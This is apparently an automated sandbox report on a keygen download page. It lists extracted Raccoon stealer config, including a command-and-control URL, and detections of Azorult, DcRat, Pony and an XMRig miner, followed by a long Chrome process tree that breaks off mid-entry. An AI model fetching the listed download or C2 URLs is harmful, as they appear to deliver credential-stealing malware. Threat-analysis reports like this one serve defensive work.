Analysis

  • max time kernel
    1800s
  • max time network
    1796s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    18-04-2021 17:27

General

  • Target

    https://keygenit.com/d/3563ee088d1n7s312q6.html

  • Sample

    210418-bdbbr7kjy2

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1256
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1944
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2724
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Modifies registry class
          PID:2616
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2432
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2400
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/3563ee088d1n7s312q6.html
              1⤵
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2112
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff85b804f50,0x7ff85b804f60,0x7ff85b804f70
                2⤵
                  PID:408
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1700 /prefetch:2
                  2⤵
                    PID:2748
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1748 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2756
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
                    2⤵
                      PID:3328
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
                      2⤵
                        PID:3852
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
                        2⤵
                          PID:2168
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                          2⤵
                            PID:3488
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                            2⤵
                              PID:2156
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
                              2⤵
                                PID:3928
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
                                2⤵
                                  PID:4128
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:8
                                  2⤵
                                    PID:4472
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4828
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6248 /prefetch:8
                                    2⤵
                                      PID:4908
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6668 /prefetch:8
                                      2⤵
                                        PID:4972
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6828 /prefetch:8
                                        2⤵
                                          PID:4992
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:8
                                          2⤵
                                            PID:5052
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7080 /prefetch:8
                                            2⤵
                                              PID:5064
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7216 /prefetch:8
                                              2⤵
                                                PID:4104
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7048 /prefetch:8
                                                2⤵
                                                  PID:4112
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7436 /prefetch:8
                                                  2⤵
                                                    PID:4304
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7432 /prefetch:8
                                                    2⤵
                                                      PID:584
                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                      2⤵
                                                        PID:4496
                                                        • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                          "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x22c,0x248,0x7ff6643aa890,0x7ff6643aa8a0,0x7ff6643aa8b0
                                                          3⤵
                                                            PID:4560
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6908 /prefetch:8
                                                          2⤵
                                                            PID:1576
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7224 /prefetch:8
                                                            2⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4664
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7380 /prefetch:8
                                                            2⤵
                                                              PID:4688
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7352 /prefetch:8
                                                              2⤵
                                                                PID:3188
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7344 /prefetch:8
                                                                2⤵
                                                                  PID:4800
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7388 /prefetch:8
                                                                  2⤵
                                                                    PID:4680
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7464 /prefetch:8
                                                                    2⤵
                                                                      PID:4852
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7532 /prefetch:8
                                                                      2⤵
                                                                        PID:4832
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7496 /prefetch:8
                                                                        2⤵
                                                                          PID:2164
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7524 /prefetch:8
                                                                          2⤵
                                                                            PID:4828
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7744 /prefetch:8
                                                                            2⤵
                                                                              PID:2700
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7792 /prefetch:8
                                                                              2⤵
                                                                                PID:4972
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7816 /prefetch:8
                                                                                2⤵
                                                                                  PID:5036
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7828 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5080
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7848 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4428
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:8
                                                                                      2⤵
                                                                                        PID:584
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5500 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4188
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2488 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4692
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4816
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4224 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4856
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3540 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4492
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4872
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4984 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5108
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5116
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7760 /prefetch:8
                                                                                                        2⤵
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:5080
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7856 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4836
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4376 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:4800
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4988 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4844
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3892 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:3932
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:4112
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5036
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:4136
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:4912
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7368 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4812
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6996 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4796
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3560 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:5096
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
                                                                                                                          2⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:4860
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6916 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:4660
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2156 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:4332
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
